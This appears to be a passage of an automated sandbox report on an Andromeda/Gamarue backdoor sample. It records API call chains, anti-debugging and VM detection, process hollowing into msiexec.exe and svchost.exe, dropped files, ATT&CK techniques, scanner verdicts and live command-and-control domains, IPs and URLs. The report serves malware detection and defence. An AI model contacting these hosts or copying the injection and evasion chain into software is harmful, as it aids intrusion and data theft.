    Source: C:\Windows\SysWOW64\svchost.exe TID: 1732Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_4-5883
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_00401220 rdtsc 4_2_00401220
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-6194
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum name: 0Jump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeCode function: 2_2_004012F0 ??2@YAPAXI@Z,GetCapture,GetMenu,GetMenuItemInfoA,malloc,GetSystemInfo,xupetipe,_ftol,Negefibizoh,fread,fclose,CreateHatchBrush,??2@YAPAXI@Z,Fetomekiratu,bedevahetay,2_2_004012F0
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_00405D07 FindFirstFileA,FindClose,0_2_00405D07
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_00405331 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405331
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_00405D07 FindFirstFileA,FindClose,5_2_00405D07
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_00405331 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,5_2_00405331
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_0040263E FindFirstFileA,5_2_0040263E
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E1E80 GetFileAttributesW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,MoveFileExW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,9_2_001E1E80
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E1700 GetDriveTypeW,wsprintfW,wsprintfW,FindFirstFileW,DeleteFileW,wsprintfW,wsprintfW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,lstrcmpiW,lstrcmpiW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,lstrcmpiW,lstrcmpiW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,wsprintfW,SetFileAttributesW,FindNextFileW,FindClose,9_2_001E1700
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E1B70 wsprintfW,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,FindClose,FindClose,9_2_001E1B70
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E10D0 RegisterClassW,LdrInitializeThunk,_memset,GetLogicalDriveStringsW,GetDriveTypeW,GetDriveTypeW,SetErrorMode,CreateWindowExW,GetMessageW,GetMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,GetMessageW,9_2_001E10D0
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeAPI call chain: ExitProcess graph end nodegraph_0-2867
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeAPI call chain: ExitProcess graph end nodegraph_2-1863
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_5-2844
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeAPI call chain: ExitProcess graph end nodegraph_6-1864
    Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
    Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
    Source: msiexec.exe, 00000007.00000002.365371579.000000000042D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.365418173.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.365771183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381464840.0000000000080000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: qemut!
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_00401999 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00401999
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_00405D2E GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405D2E
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00020973 GetProcessHeap,GetVersionExA,NtQueryInformationProcess,NtDelayExecution,VirtualAlloc,GetEnvironmentVariableW,SetEnvironmentVariableW,GetShortPathNameW,wsprintfA,CreateMutexA,GetLastError,SetFileAttributesW,DeleteFileW,VirtualFree,WSAStartup,CreateThread,CloseHandle,CreateThread,CloseHandle,CreateThread,WaitForSingleObject,CloseHandle,NtDelayExecution,SetFileAttributesW,DeleteFileW,VirtualFree,ExitProcess,SetErrorMode,9_2_00020973
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_00401220 rdtsc 4_2_00401220
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 8_2_00401284 mov ebx, dword ptr fs:[00000030h]8_2_00401284
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 8_2_0040141C mov eax, dword ptr fs:[00000030h]8_2_0040141C
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00081284 mov ebx, dword ptr fs:[00000030h]9_2_00081284
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0008141C mov eax, dword ptr fs:[00000030h]9_2_0008141C
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00020550 mov ebx, dword ptr fs:[00000030h]9_2_00020550
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00020973 mov eax, dword ptr fs:[00000030h]9_2_00020973
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_000219D1 mov eax, dword ptr fs:[00000030h]9_2_000219D1
    Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E10D0 RegisterClassW,LdrInitializeThunk,_memset,GetLogicalDriveStringsW,GetDriveTypeW,GetDriveTypeW,SetErrorMode,CreateWindowExW,GetMessageW,GetMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,GetMessageW,9_2_001E10D0
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_00401999 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00401999
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_00401E7F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00401E7F
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E3493 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_001E3493
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E2D41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_001E2D41

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 147.75.61.38 80Jump to behavior
    Source: C:\Windows\SysWOW64\svchost.exeDomain query: pe.suckmycocklameavindustry.in
    Source: C:\Windows\SysWOW64\svchost.exeDomain query: xdqzpbcgrvkj.ru
    Source: C:\Windows\SysWOW64\svchost.exeDomain query: anam0rph.su
    Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.29.71.138 80Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeSection unmapped: C:\Users\user\Desktop\Hu25VEa8Dr.exe base address: 400000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeSection unmapped: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeSection unmapped: C:\Users\user\Desktop\Hu25VEa8Dr.exe base address: 400000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: CD0000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeMemory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 400000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeMemory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 401000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeMemory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 402000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeMemory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 403000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeMemory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 7EFDE008Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeMemory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 400000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeMemory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 401000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeMemory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 402000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeMemory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 403000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeMemory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 7EFDE008Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeMemory allocated: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 400000 protect: page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeMemory allocated: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 400000 protect: page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeMemory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 400000 value starts with: 4D5AJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeMemory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 400000 value starts with: 4D5AJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeMemory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 400000 value starts with: 4D5AJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeMemory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 400000 value starts with: 4D5AJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeCode function: 2_2_10001000 bedevahetay,LoadLibraryA,GetCommandLineA,PathGetArgsA,RtlZeroMemory,LoadLibraryA,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,SetThreadContext,2_2_10001000
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe C:\Users\user\AppData\Local\Temp\Sahofivizu.exe" "C:\Users\user\Desktop\Hu25VEa8Dr.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeProcess created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exeJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exeJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe "C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe" "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\syswow64\svchost.exeJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_00401000 GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,4_2_00401000
    Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_0040332F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_0040332F
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_00405A2E GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405A2E
    Source: Hu25VEa8Dr.exeBinary or memory string: avp.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1740, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1740, type: MEMORYSTR
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts3
    Native API
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    1
    Obfuscated Files or Information
    OS Credential Dumping1
    System Time Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium13
    Ingress Tool Transfer
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default Accounts1
    Shared Modules
    1
    Registry Run Keys / Startup Folder
    711
    Process Injection
    21
    Software Packing
    LSASS Memory1
    Peripheral Device Discovery
    Remote Desktop Protocol1
    Clipboard Data
    Exfiltration Over Bluetooth2
    Encrypted Channel
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts2
    Command and Scripting Interpreter
    Logon Script (Windows)1
    Registry Run Keys / Startup Folder
    1
    DLL Side-Loading
    Security Account Manager1
    System Network Connections Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
    Masquerading
    NTDS3
    File and Directory Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer13
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Modify Registry
    LSA Secrets116
    System Information Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common13
    Virtualization/Sandbox Evasion
    Cached Domain Credentials361
    Security Software Discovery
    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items711
    Process Injection
    DCSync13
    Virtualization/Sandbox Evasion
    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
    Process Discovery
    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
    Remote System Discovery
    Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1317431 Sample: Hu25VEa8Dr Startdate: 01/10/2023 Architecture: WINDOWS Score: 100 94 Tries to download HTTP data from a sinkholed server 2->94 96 Snort IDS alert for network traffic 2->96 98 Multi AV Scanner detection for domain / URL 2->98 100 7 other signatures 2->100 12 Hu25VEa8Dr.exe 15 2->12         started        process3 file4 48 C:\Users\user\AppData\...\xuxokuxoka.dll, PE32 12->48 dropped 50 C:\Users\user\AppData\...\natigezeholi.dll, PE32 12->50 dropped 52 C:\Users\user\AppData\...\Zojemilocan.dll, PE32 12->52 dropped 54 2 other malicious files 12->54 dropped 112 Detected unpacking (changes PE section rights) 12->112 114 Detected unpacking (overwrites its own PE header) 12->114 16 Sahofivizu.exe 12->16         started        19 svchost.exe 2 16 12->19         started        signatures5 process6 dnsIp7 70 Antivirus detection for dropped file 16->70 72 Multi AV Scanner detection for dropped file 16->72 74 Contains functionality to inject code into remote processes 16->74 84 4 other signatures 16->84 23 Hu25VEa8Dr.exe 18 16->23         started        64 pe.suckmycocklameavindustry.in 19->64 66 xdqzpbcgrvkj.ru 147.75.61.38, 49166, 80 PACKETUS Switzerland 19->66 68 3 other IPs or domains 19->68 42 C:\ProgramData\Local Settings\...\msoiruj.bat, PE32 19->42 dropped 76 System process connects to network (likely due to code injection or exploit) 19->76 78 Creates an undocumented autostart registry key 19->78 80 Contains functionality to check if Internet connection is working 19->80 82 Contain functionality to detect virtual machines 19->82 file8 signatures9 process10 signatures11 106 Injects a PE file into a foreign processes 23->106 26 Hu25VEa8Dr.exe 2 5 23->26         started        process12 file13 44 C:\Users\user\AppData\Local\...\msiexec.exe, PE32 26->44 dropped 46 C:\Users\user\AppData\Local\Temp\0BBFF.tmp, PE32 26->46 dropped 29 msiexec.exe 15 26->29         started        process14 file15 56 C:\Users\user\AppData\...\yiduyevutog.dll, PE32 29->56 dropped 58 C:\Users\user\AppData\...\naseropuxeq.dll, PE32 29->58 dropped 60 C:\Users\user\AppData\...\Lohonibuhod.exe, PE32 29->60 dropped 62 2 other malicious files 29->62 dropped 116 Antivirus detection for dropped file 29->116 118 Multi AV Scanner detection for dropped file 29->118 120 Detected unpacking (changes PE section rights) 29->120 122 4 other signatures 29->122 33 Lohonibuhod.exe 29->33         started        signatures16 process17 signatures18 86 Antivirus detection for dropped file 33->86 88 Multi AV Scanner detection for dropped file 33->88 90 Writes to foreign memory regions 33->90 92 3 other signatures 33->92 36 msiexec.exe 9 33->36         started        process19 signatures20 102 Sample uses process hollowing technique 36->102 104 Injects a PE file into a foreign processes 36->104 39 msiexec.exe 36->39         started        process21 signatures22 108 Maps a DLL or memory area into another process 39->108 110 Sample uses process hollowing technique 39->110

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Hu25VEa8Dr.exe96%ReversingLabsWin32.Backdoor.Andromeda
    Hu25VEa8Dr.exe82%VirustotalBrowse
    Hu25VEa8Dr.exe100%AviraTR/AD.Gamarue.njjtd
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\Gozekeneka.dll100%AviraHEUR/AGEN.1358866
    C:\Users\user\AppData\Local\Temp\0BBFF.tmp100%AviraTR/AD.Gamarue.njjtd
    C:\Users\user\AppData\Local\Temp\xuxokuxoka.dll100%AviraTR/Symmi.17001.30
    C:\Users\user\AppData\Local\Temp\naseropuxeq.dll100%AviraTR/Graftor.75972.7
    C:\Users\user\AppData\Local\Temp\yiduyevutog.dll100%AviraTR/Symmi.17001.22
    C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe100%AviraTR/Agent.hwpf
    C:\Users\user\AppData\Local\Temp\natigezeholi.dll100%AviraHEUR/AGEN.1328724
    C:\ProgramData\Local Settings\Temp\msoiruj.bat100%AviraTR/AD.Gamarue.djauj
    C:\Users\user\AppData\Local\Temp\Sahofivizu.exe100%AviraHEUR/AGEN.1344339
    C:\Users\user\AppData\Local\Temp\Jahulocayedo.dll100%AviraTR/Symmi.17001.23
    C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe100%AviraTR/AD.Gamarue.djauj
    C:\Users\user\AppData\Local\Temp\Zojemilocan.dll100%AviraHEUR/AGEN.1322941
    C:\ProgramData\Local Settings\Temp\msoiruj.bat100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe100%Joe Sandbox ML
    C:\ProgramData\Local Settings\Temp\msoiruj.bat87%ReversingLabsWin32.Backdoor.Andromeda
    C:\ProgramData\Local Settings\Temp\msoiruj.bat85%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\0BBFF.tmp96%ReversingLabsWin32.Backdoor.Andromeda
    C:\Users\user\AppData\Local\Temp\0BBFF.tmp82%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\Firozedikami.dll59%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Temp\Firozedikami.dll59%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\Gozekeneka.dll77%ReversingLabsWin32.Trojan.Tiggre
    C:\Users\user\AppData\Local\Temp\Gozekeneka.dll75%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\Jahulocayedo.dll71%ReversingLabsWin32.Trojan.Ursu
    C:\Users\user\AppData\Local\Temp\Jahulocayedo.dll66%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe76%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe77%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe87%ReversingLabsWin32.Backdoor.Andromeda
    C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe85%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\Sahofivizu.exe57%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Temp\Sahofivizu.exe61%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\Zojemilocan.dll64%ReversingLabsWin32.Backdoor.Andromeda
    C:\Users\user\AppData\Local\Temp\Zojemilocan.dll74%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\naseropuxeq.dll59%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Temp\naseropuxeq.dll71%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\natigezeholi.dll78%ReversingLabsWin32.Trojan.Ursu
    C:\Users\user\AppData\Local\Temp\natigezeholi.dll76%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\xuxokuxoka.dll67%ReversingLabsWin32.Trojan.Symmi
    C:\Users\user\AppData\Local\Temp\xuxokuxoka.dll67%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\yiduyevutog.dll71%ReversingLabsWin32.Trojan.Ursu
    C:\Users\user\AppData\Local\Temp\yiduyevutog.dll73%VirustotalBrowse
    No Antivirus matches
    SourceDetectionScannerLabelLink
    xdqzpbcgrvkj.ru19%VirustotalBrowse
    anam0rph.su11%VirustotalBrowse
    pe.suckmycocklameavindustry.in7%VirustotalBrowse
    SourceDetectionScannerLabelLink
    http://pe.suckmycocklameavindustry.in/0%Avira URL Cloudsafe
    http://orzdwjtvmein.in/in.php100%Avira URL Cloudmalware
    http://bdcrqgonzmwuehky.nl/in.php100%Avira URL Cloudmalware
    http://pe.suckmycocklameavindustry.in/DOS_STUBhttp://sc.suckmycocklameavindustry.in/ImageBasehttp://0%Avira URL Cloudsafe
    http://orzdwjtvmein.in/in.php11%VirustotalBrowse
    http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigffC:0%Avira URL Cloudsafe
    http://pe.suckmycocklameavindustry.in/7%VirustotalBrowse
    http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigff6Tl0%Avira URL Cloudsafe
    http://somicrososoft.ru/in.php100%Avira URL Cloudmalware
    http://pe.suckmycocklameavindustry.in/DOS_STUBhttp://sc.suckmycocklameavindustry.in/ImageBasehttp://3%VirustotalBrowse
    http://img.suckmycocklameavindustry.in/0%Avira URL Cloudsafe
    http://xdqzpbcgrvkj.ru/in.php100%Avira URL Cloudmalware
    http://bdcrqgonzmwuehky.nl/in.php11%VirustotalBrowse
    http://somicrososoft.ru/in.php14%VirustotalBrowse
    http://anam0rph.su/in.php100%Avira URL Cloudmalware
    http://xdqzpbcgrvkj.ru/in.phphttp://anam0rph.su/in.phphttp://orzdwjtvmein.in/in.phphttp://ygiudewsqh100%Avira URL Cloudmalware
    http://img.suckmycocklameavindustry.in/4%VirustotalBrowse
    http://sc.suckmycocklameavindustry.in/0%Avira URL Cloudsafe
    http://ygiudewsqhct.in/in.php100%Avira URL Cloudmalware
    http://anam0rph.su/in.php13%VirustotalBrowse
    http://xdqzpbcgrvkj.ru/in.phphttp://anam0rph.su/in.phphttp://orzdwjtvmein.in/in.phphttp://ygiudewsqh14%VirustotalBrowse
    http://ygiudewsqhct.in/in.php13%VirustotalBrowse
    http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigff0%Avira URL Cloudsafe
    http://xdqzpbcgrvkj.ru/in.php17%VirustotalBrowse
    http://sc.suckmycocklameavindustry.in/7%VirustotalBrowse
    NameIPActiveMaliciousAntivirus DetectionReputation
    pe.suckmycocklameavindustry.in
    34.29.71.138
    truetrueunknown
    xdqzpbcgrvkj.ru
    147.75.61.38
    truetrueunknown
    anam0rph.su
    unknown
    unknowntrueunknown
    NameMaliciousAntivirus DetectionReputation
    http://xdqzpbcgrvkj.ru/in.phptrue
    • 17%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigfftrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://pe.suckmycocklameavindustry.in/svchost.exefalse
    • 7%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://orzdwjtvmein.in/in.phpsvchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpfalse
    • 11%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    http://nsis.sf.net/NSIS_Errormsiexec.exe, msiexec.exe, 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmp, msiexec.exe, 00000005.00000000.351213851.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, msiexec.exe, 00000007.00000000.364458175.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, msiexec.exe, 00000008.00000000.365114158.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, Hu25VEa8Dr.exe, 0BBFF.tmp.4.dr, msoiruj.bat.9.dr, msiexec.exe.4.drfalse
      high
      http://bdcrqgonzmwuehky.nl/in.phpsvchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpfalse
      • 11%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
